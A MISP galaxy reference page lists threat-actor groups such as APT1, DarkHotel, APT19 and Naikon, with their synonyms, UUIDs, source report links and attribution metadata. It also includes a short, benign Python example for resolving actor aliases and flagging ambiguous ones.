Threat Actor
Known or estimated adversary groups targeting organizations and employees. Adversary groups are regularly confused with their initial operation or campaign. The threat-actor-classification meta field can be used to clarify whether a threat-actor entry is also to be understood as an operation, campaign or activity group.
Authors
Authors and/or Contributors |
---|
Alexandre Dulaunoy |
Florian Roth |
Thomas Schreck |
Timo Steffens |
Various |
APT1
PLA Unit 61398 (Chinese: 61398部队, Pinyin: 61398 bùduì) is the Military Unit Cover Designator (MUCD) of a People's Liberation Army advanced persistent threat unit that has been alleged to be a source of Chinese computer hacking attacks.
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with APT1.
Known Synonyms |
---|
Brown Fox |
Byzantine Candor |
COMMENT PANDA |
Comment Crew |
Comment Group |
G0006 |
GIF89a |
Group 3 |
PLA Unit 61398 |
ShadyRAT |
TG-8223 |
Internal MISP references
UUID 1cb7e1cc-d695-42b1-92f4-fd0112a3c9be
which can be used as unique global reference for APT1
in MISP communities and other software using the MISP galaxy
External references
- https://en.wikipedia.org/wiki/PLA_Unit_61398 - webarchive
- http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/pla-unit-61398 - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/the-siesta-campaign-a-new-targeted-attack-awakens/ - webarchive
- https://www.fireeye.com/blog/threat-research/2014/03/a-detailed-examination-of-the-siesta-campaign.html - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-oceansalt-delivers-wave-after-wave/ - webarchive
- https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=f1265df5-6e5e-4fcc-9828-d4ddbbafd3d7&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://attack.mitre.org/groups/G0006/ - webarchive
- https://www.nytimes.com/2014/05/20/us/us-to-charge-chinese-workers-with-cyberspying.html - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'Taiwan', 'Israel', 'Norway', 'United Arab Emirates', 'United Kingdom', 'Singapore', 'India', 'Belgium', 'South Africa', 'Switzerland', 'Canada', 'France', 'Luxembourg', 'Japan'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
To see the related clusters, click here.
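The synonym table and the UUID in each entry are what make these clusters usable in tooling: the UUID is the stable key, the synonyms are the lookup surface, and an alias that two clusters both claim is an attribution error waiting to happen. The Python below is an added example written for this page, not code from the MISP project; the three cluster records are constructed from the APT1, Naikon and APT30 entries above in the shape of the galaxy JSON file (a "values" list of objects with "value", "uuid" and "meta.synonyms"), and the misp-galaxy:threat-actor="…" string is the tag form MISP applies when a cluster is attached to an event. It resolves an alias to cluster UUIDs and refuses to emit a tag when the alias is ambiguous, as G0013 is on this page (listed under both Naikon and APT30).

```python
"""Resolve threat-actor aliases against MISP galaxy clusters.

Cluster records are constructed from the APT1, Naikon and APT30 entries on
this page, in the shape of the galaxy JSON (threat-actor.json):
{"values": [{"value": ..., "uuid": ..., "meta": {"synonyms": [...]}}]}.
"""
from __future__ import annotations

from collections import defaultdict

GALAXY = {  # constructed subset of the galaxy, not the full file
    "name": "Threat Actor",
    "type": "threat-actor",
    "values": [
        {
            "value": "APT1",
            "uuid": "1cb7e1cc-d695-42b1-92f4-fd0112a3c9be",
            "meta": {
                "country": "CN",
                "attribution-confidence": "50",
                "synonyms": ["Comment Crew", "COMMENT PANDA", "G0006",
                             "PLA Unit 61398", "TG-8223"],
            },
        },
        {
            "value": "Naikon",
            "uuid": "2f1fd017-9df6-4759-91fb-e7039609b5ff",
            "meta": {"country": "CN",
                     "synonyms": ["G0013", "G0019", "OVERRIDE PANDA", "PLA Unit 78020"]},
        },
        {
            "value": "APT30",
            "uuid": "d3881afe-f781-4c53-9f68-33487a119a59",
            "meta": {"country": "CN", "synonyms": ["G0013"]},
        },
    ],
}


def normalise(name: str) -> str:
    """Case-, whitespace- and punctuation-insensitive key, so that
    'Comment Crew', 'comment crew' and 'COMMENTCREW' collide on purpose."""
    return "".join(ch for ch in name.lower() if ch.isalnum())


def build_alias_index(galaxy: dict) -> dict[str, set[str]]:
    """Map every cluster value and synonym to the set of cluster UUIDs that
    claim it. A set rather than one UUID: the same alias can be listed by
    more than one cluster, and that ambiguity must surface, not vanish."""
    index: dict[str, set[str]] = defaultdict(set)
    for cluster in galaxy["values"]:
        names = [cluster["value"], *cluster.get("meta", {}).get("synonyms", [])]
        for name in names:
            index[normalise(name)].add(cluster["uuid"])
    return dict(index)


def resolve_alias(galaxy: dict, alias: str) -> set[str]:
    """UUIDs for an alias: empty if unknown, more than one if ambiguous."""
    return build_alias_index(galaxy).get(normalise(alias), set())


def ambiguous_aliases(galaxy: dict) -> dict[str, set[str]]:
    """Aliases claimed by more than one cluster, for review before tagging."""
    return {k: v for k, v in build_alias_index(galaxy).items() if len(v) > 1}


def misp_tag(galaxy: dict, alias: str) -> str:
    """The tag MISP attaches for a galaxy cluster: misp-galaxy:<type>="<value>".
    Raises on an unknown or ambiguous alias instead of silently picking one."""
    uuids = resolve_alias(galaxy, alias)
    if len(uuids) != 1:
        raise ValueError(f"{alias!r} resolves to {len(uuids)} clusters; resolve manually")
    (uuid,) = uuids
    value = next(c["value"] for c in galaxy["values"] if c["uuid"] == uuid)
    return f'misp-galaxy:{galaxy["type"]}="{value}"'


if __name__ == "__main__":
    print(resolve_alias(GALAXY, "comment crew"))
    print(ambiguous_aliases(GALAXY))
    print(misp_tag(GALAXY, "TG-8223"))
```

Normalisation is deliberately aggressive so that vendor spellings collide; run ambiguous_aliases() over the full galaxy before wiring it into automated enrichment, because a first-match lookup would tag APT30 activity as Naikon (or the reverse) without any error.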
Nitro
These attackers were the subject of an extensive report by Symantec in 2011, which termed the attackers Nitro and stated: 'The goal of the attackers appears to be to collect intellectual property such as design documents, formulas, and manufacturing processes. In addition, the same attackers appear to have a lengthy operation history including attacks on other industries and organizations. Attacks on the chemical industry are merely their latest attack wave. As part of our investigations, we were also able to identify and contact one of the attackers to try and gain insights into the motivations behind these attacks.' Palo Alto Networks reported on continued activity by the attackers in 2014.
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with Nitro.
Known Synonyms |
---|
Covert Grove |
Internal MISP references
UUID 0b06fb39-ed3d-4868-ac42-12fff6df2c80
which can be used as unique global reference for Nitro
in MISP communities and other software using the MISP galaxy
External references
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf - webarchive
- https://unit42.paloaltonetworks.com/new-indicators-compromise-apt-group-nitro-uncovered/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/the-significance-of-the-nitro-attacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
targeted-sector | ['Chemical'] |
Dust Storm
The threat actors behind Operation Dust Storm have been active since at least 2010 and have targeted several organizations in Japan, South Korea, the US, Europe, and other Asian countries.
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with Dust Storm.
Known Synonyms |
---|
G0031 |
Internal MISP references
UUID 9e71024e-817f-45b0-92a0-d886c30bc929
which can be used as unique global reference for Dust Storm
in MISP communities and other software using the MISP galaxy
External references
Related clusters
To see the related clusters, click here.
WET PANDA
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with WET PANDA.
Known Synonyms |
---|
Red Chimera |
Internal MISP references
UUID ba8973b2-fd97-4aa7-9307-ea4838d96428
which can be used as unique global reference for WET PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
FOXY PANDA
Adversary group targeting telecommunication and technology organizations.
Internal MISP references
UUID 41c15f08-a646-49f7-a644-1bebbf7a4dcd
which can be used as unique global reference for FOXY PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
targeted-sector | ['Technology', 'Telecoms'] |
PREDATOR PANDA
Internal MISP references
UUID 1969f622-d64a-4436-9a34-4c47fcb2535f
which can be used as unique global reference for PREDATOR PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
UNION PANDA
Internal MISP references
UUID 7195b51f-500e-4034-a851-bf34a2728dc8
which can be used as unique global reference for UNION PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
SPICY PANDA
Internal MISP references
UUID 4959652d-72fa-46e4-be20-4ec686409bfb
which can be used as unique global reference for SPICY PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
ELOQUENT PANDA
Internal MISP references
UUID 432b0304-768f-4fb9-9762-e745ef524ec7
which can be used as unique global reference for ELOQUENT PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
DIZZY PANDA
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with DIZZY PANDA.
Known Synonyms |
---|
LadyBoyle |
Internal MISP references
UUID 8a8f39df-74b3-4946-ab64-f84968bababe
which can be used as unique global reference for DIZZY PANDA
in MISP communities and other software using the MISP galaxy
Grayling
Grayling activity was first observed in early 2023, when a number of victims were identified with distinctive malicious DLL side-loading activity. Grayling appears to target organisations in Asia, although one unidentified organisation in the United States was also targeted. Industries targeted include biomedical, government and information technology. Grayling uses a variety of tools during its attacks, including well-known tools such as Cobalt Strike and Havoc, alongside others.
Internal MISP references
UUID 6714de29-4dd8-463c-99a3-77c9e80fa47d
which can be used as unique global reference for Grayling
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Taiwan', 'United States', 'Vietnam', 'Solomon Islands'] |
cfr-target-category | ['Biomedical', 'Government', 'Information technology'] |
country | CN |
APT2
Putter Panda were the subject of an extensive report by CrowdStrike, which stated: 'The CrowdStrike Intelligence team has been tracking this particular unit since 2012, under the codename PUTTER PANDA, and has documented activity dating back to 2007. The report identifies Chen Ping, aka cpyy, and the primary location of Unit 61486.'
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with APT2.
Known Synonyms |
---|
4HCrew |
G0024 |
MSUpdater |
PLA Unit 61486 |
PUTTER PANDA |
SULPHUR |
SearchFire |
TG-6952 |
Internal MISP references
UUID 0ca45163-e223-4167-b1af-f088ed14a93d
which can be used as unique global reference for APT2
in MISP communities and other software using the MISP galaxy
External references
- http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/putter-panda - webarchive
- https://attack.mitre.org/groups/G0024 - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['U.S. satellite and aerospace sector'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
To see the related clusters, click here.
APT3
Symantec described UPS in a 2016 report as: 'Buckeye (also known as APT3, Gothic Panda, UPS Team, and TG-0110) is a cyberespionage group that is believed to have been operating for well over half a decade. Traditionally, the group attacked organizations in the US as well as other targets. However, Buckeye's focus appears to have changed as of June 2015, when the group began compromising political entities in Hong Kong.'
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with APT3.
Known Synonyms |
---|
BORON |
BRONZE MAYFAIR |
Boyusec |
Buckeye |
GOTHIC PANDA |
Group 6 |
Red Sylvan |
TG-0110 |
UPS |
Internal MISP references
UUID d144c83e-2302-4947-9e24-856fbf7949ae
which can be used as unique global reference for APT3
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html - webarchive
- https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-3 - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mayfair - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'United Kingdom', 'Hong Kong'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Political party'] |
Related clusters
To see the related clusters, click here.
DarkHotel
Kaspersky described DarkHotel in a 2014 report as: '... DarkHotel drives its campaigns by spear-phishing targets with highly advanced Flash zero-day exploits that effectively evade the latest Windows and Adobe defenses, and yet they also imprecisely spread among large numbers of vague targets with peer-to-peer spreading tactics. Moreover, this crew's most unusual characteristic is that for several years the Darkhotel APT has maintained a capability to use hotel networks to follow and hit selected targets as they travel around the world.'
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with DarkHotel.
Known Synonyms |
---|
APT-C-06 |
ATK52 |
DUBNIUM |
Fallout Team |
G0012 |
Karba |
Luder |
Nemim |
Nemin |
Pioneer |
SIG25 |
Shadow Crane |
T-APT-02 |
TUNGSTEN BRIDGE |
Tapaoux |
Zigzag Hail |
Internal MISP references
UUID b8c8b96d-61e6-47b1-8e38-fd8ad5d9854d
which can be used as unique global reference for DarkHotel
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/ - webarchive
- https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2 - webarchive
- https://securelist.com/blog/research/66779/the-darkhotel-apt/ - webarchive
- https://securelist.com/the-darkhotel-apt/66779/ - webarchive
- https://web.archive.org/web/20160104165148/http://drops.wooyun.org/tips/11726 - webarchive
- https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/darkhotel - webarchive
- https://www.securityweek.com/darkhotel-apt-uses-new-methods-target-politicians - webarchive
- https://attack.mitre.org/groups/G0012/ - webarchive
- https://www.secureworks.com/research/threat-profiles/tungsten-bridge - webarchive
- https://www.antiy.cn/research/notice&report/research_report/20200522.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Korea (Republic of) |
cfr-suspected-victims | ['Japan', 'Russia', 'Taiwan', 'South Korea', 'China'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
country | KR |
Related clusters
To see the related clusters, click here.
APT12
A group of China-based attackers, who conducted a number of spear phishing attacks in 2013.
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with APT12.
Known Synonyms |
---|
BRONZE GLOBE |
BeeBus |
Calc Team |
Crimson Iron |
DNSCalc |
DynCalc |
Group 22 |
IXESHE |
NUMBERED PANDA |
TG-2754 |
Internal MISP references
UUID 48146604-6693-4db1-bd94-159744726514
which can be used as unique global reference for APT12
in MISP communities and other software using the MISP galaxy
External references
- http://www.crowdstrike.com/blog/whois-numbered-panda/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-12 - webarchive
- https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-globe - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Taiwan', 'Japan'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
To see the related clusters, click here.
APT16
Between November 26, 2015, and December 1, 2015, known and suspected China-based APT groups launched several spear-phishing attacks targeting Japanese and Taiwanese organizations in the high-tech, government services, media and financial services industries. Each campaign delivered a malicious Microsoft Word document exploiting the EPS "dict copy" use-after-free vulnerability (CVE-2015-2545) together with the local Windows privilege escalation vulnerability CVE-2015-1701. Successful exploitation of both vulnerabilities led to the delivery of either a downloader that FireEye refers to as IRONHALO, or a backdoor that FireEye refers to as ELMER.
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with APT16.
Known Synonyms |
---|
G0023 |
SVCMONDR |
Internal MISP references
UUID 1f73e14f-b882-4032-a565-26dc653b0daf
which can be used as unique global reference for APT16
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-16 - webarchive
- https://attack.mitre.org/groups/G0023 - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Japan', 'Taiwan'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
APT17
FireEye described APT17 in a 2015 report as: 'APT17, also known as DeputyDog, is a China-based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations.'
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with APT17.
Known Synonyms |
---|
AURORA PANDA |
Axiom |
BRONZE KEYSTONE |
Dogfish |
G0001 |
G0025 |
Group 72 |
Group 8 |
HELIUM |
Hidden Lynx |
Tailgater Team |
Internal MISP references
UUID 99e30d89-9361-4b73-a999-9e5ff9320bcb
which can be used as unique global reference for APT17
in MISP communities and other software using the MISP galaxy
External references
- https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-17 - webarchive
- https://www.carbonblack.com/2013/02/08/bit9-and-our-customers-security/ - webarchive
- https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware - webarchive
- https://web.archive.org/web/20130920000343/https://www.symantec.com/connect/blogs/hidden-lynx-professional-hackers-hire - webarchive
- https://www.recordedfuture.com/hidden-lynx-analysis/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-keystone - webarchive
- https://attack.mitre.org/groups/G0025/ - webarchive
- https://cfr.org/cyber-operations/axiom - webarchive
- https://attack.mitre.org/groups/G0001/ - webarchive
- https://www.youtube.com/watch?v=NFJqD-LcpIg - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'Netherlands', 'Italy', 'Japan', 'United Kingdom', 'Belgium', 'Russia', 'Indonesia', 'Germany', 'Switzerland', 'China'] |
cfr-target-category | ['Government', 'Private sector', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Defense', 'Intelligence', 'Technology', 'Mining', 'Government, Administration', 'Justice'] |
Related clusters
To see the related clusters, click here.
APT18
Wekby was described by Palo Alto Networks in a 2015 report as: 'Wekby is a group that has been active for a number of years, targeting various industries such as healthcare, telecommunications, aerospace, defense, and high tech. The group is known to leverage recently released exploits very shortly after those exploits are available, such as in the case of Hacking Team's Flash zero-day exploit.'
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with APT18.
Known Synonyms |
---|
DYNAMITE PANDA |
G0026 |
PLA Navy |
SCANDIUM |
TG-0416 |
Wekby |
Internal MISP references
UUID 9a683d9c-8f7d-43df-bba2-ad0ca71e277c
which can be used as unique global reference for APT18
in MISP communities and other software using the MISP galaxy
External references
- https://threatpost.com/apt-gang-branches-out-to-medical-espionage-in-community-health-breach/107828 - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-18 - webarchive
- https://attack.mitre.org/groups/G0026 - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States'] |
cfr-target-category | ['Government', 'Private sector', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Aerospace', 'Defense', 'Health', 'High tech', 'Telecoms'] |
Related clusters
To see the related clusters, click here.
APT19
Adversary group targeting financial, technology, and non-profit organisations.
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with APT19.
Known Synonyms |
---|
BRONZE FIRESTONE |
Black Vine |
Codoso |
DEEP PANDA |
G0009 |
G0073 |
Group 13 |
KungFu Kittens |
PinkPanther |
Pupa |
Shell Crew |
Sunshop Group |
TEMP.Avengers |
WebMasters |
Internal MISP references
UUID 066d25c1-71bd-4bd4-8ca7-edbba00063f4
which can be used as unique global reference for APT19
in MISP communities and other software using the MISP galaxy
External references
- http://cybercampaigns.net/wp-content/uploads/2013/06/Deep-Panda.pdf - webarchive
- https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/deep-panda - webarchive
- https://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/ - webarchive
- https://eromang.zataz.com/2013/01/02/capstone-turbine-corporation-also-targeted-in-the-cfr-watering-hole-attack-and-more/ - webarchive
- https://www.crowdstrike.com/blog/department-labor-strategic-web-compromise/ - webarchive
- https://www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/ - webarchive
- https://krebsonsecurity.com/2015/06/catching-up-on-the-opm-breach/ - webarchive
- https://krebsonsecurity.com/2015/02/anthem-breach-may-have-started-in-april-2014/ - webarchive
- https://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/ - webarchive
- https://www.crowdstrike.com/blog/ironman-deep-panda-uses-sakula-malware-target-organizations-multiple-sectors/ - webarchive
- https://www.abc.net.au/news/2014-11-13/g20-china-affliliated-hackers-breaches-australian-media/5889442 - webarchive
- https://www.washingtonpost.com/business/economy/keypoint-suffers-network-breach-thousands-of-fed-workers-could-be-affected/2014/12/18/e6c7146c-86e1-11e4-a702-fa31ff4ae98e_story.html - webarchive
- https://www.seattletimes.com/business/local-business/feds-warned-premera-about-security-flaws-before-breach/ - webarchive
- https://krebsonsecurity.com/2015/05/carefirst-blue-cross-breach-hits-1-1m/ - webarchive
- https://threatvector.cylance.com/en_us/home/shell-crew-variants-continue-to-fly-under-big-avs-radar.html - webarchive
- https://www.bleepingcomputer.com/news/security/us-arrests-chinese-man-involved-with-sakula-malware-used-in-opm-and-anthem-hacks/ - webarchive
- https://gizmodo.com/u-s-indicts-chinese-hacker-spies-in-conspiracy-to-stea-1830111695 - webarchive
- https://www.cyberscoop.com/anthem-breach-indictment-chinese-national/ - webarchive
- https://docs.broadcom.com/doc/the-black-vine-cyberespionage-group - webarchive
- https://attack.mitre.org/groups/G0009/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-firestone - webarchive
- https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks - webarchive
- http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/ - webarchive
- https://www.nytimes.com/2016/06/12/technology/the-chinese-hackers-in-the-back-office.html - webarchive
- https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel - webarchive
- https://www.youtube.com/watch?v=FC9ARZIZglI - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States'] |
cfr-target-category | ['Private sector', 'Military'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Technology', 'Finance', 'Non-profit organisation'] |
Related clusters
To see the related clusters, click here.
Naikon
Kaspersky described Naikon in a 2015 report as: 'The Naikon group is mostly active in countries such as the Philippines, Malaysia, Cambodia, Indonesia, Vietnam, Myanmar, Singapore, and Nepal, hitting a variety of targets in a very opportunistic way.'
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with Naikon.
Known Synonyms |
---|
BRONZE GENEVA |
BRONZE STERLING |
Camerashy |
G0013 |
G0019 |
Naikon |
OVERRIDE PANDA |
PLA Unit 78020 |
Internal MISP references
UUID 2f1fd017-9df6-4759-91fb-e7039609b5ff
which can be used as unique global reference for Naikon
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/analysis/publications/69953/the-naikon-apt/ - webarchive
- https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf - webarchive
- https://usa.kaspersky.com/resource-center/threats/naikon-targeted-attacks - webarchive
- https://web.archive.org/web/20210925164035/https://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/ - webarchive
- https://threatconnect.com/blog/tag/naikon/ - webarchive
- https://attack.mitre.org/groups/G0019/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-geneva - webarchive
- https://cyware.com/news/chinese-naikon-group-back-with-new-espionage-attack-66a8413d - webarchive
- https://cluster25.io/2022/04/29/lotus-panda-awake-last-strike/ - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['India', 'Saudi Arabia', 'Vietnam', 'Myanmar', 'Singapore', 'Thailand', 'Malaysia', 'Cambodia', 'China', 'Philippines', 'South Korea', 'United States', 'Indonesia', 'Laos'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
To see the related clusters, click here.
APT30
APT30 is a threat group suspected to be associated with the Chinese government. While Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches.
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with APT30.
Known Synonyms |
---|
G0013 |
Internal MISP references
UUID d3881afe-f781-4c53-9f68-33487a119a59
which can be used as unique global reference for APT30
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'South Korea', 'Saudi Arabia', 'Thailand', 'Vietnam', 'Malaysia', 'India'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
To see the related clusters, click here.
LOTUS PANDA
Lotus Blossom is a threat group that has targeted government and military organizations in Southeast Asia.
Synonyms
The "synonyms" entry in the meta part lists alternate names or labels associated with LOTUS PANDA.
Known Synonyms |
---|
ATK1 |
BRONZE ELGIN |
DRAGONFISH |
G0030 |
Lotus Blossom |
Red Salamander |
ST Group |
Spring Dragon |
Internal MISP references
UUID 32fafa69-fe3c-49db-afd4-aac2664bcf0d
which can be used as unique global reference for LOTUS PANDA
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/blog/research/70726/the-spring-dragon-apt/ - webarchive
- https://securelist.com/spring-dragon-updated-activity/79067/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/lotus-blossom - webarchive
- https://unit42.paloaltonetworks.com/operation-lotus-blossom/ - webarchive
- https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-46/Accenture-Security-Elise-Threat-Analysis.pdf - webarchive
- https://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/ - webarchive
- https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting - webarchive
- https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf - webarchive
- https://attack.mitre.org/groups/G0030/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-elgin - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
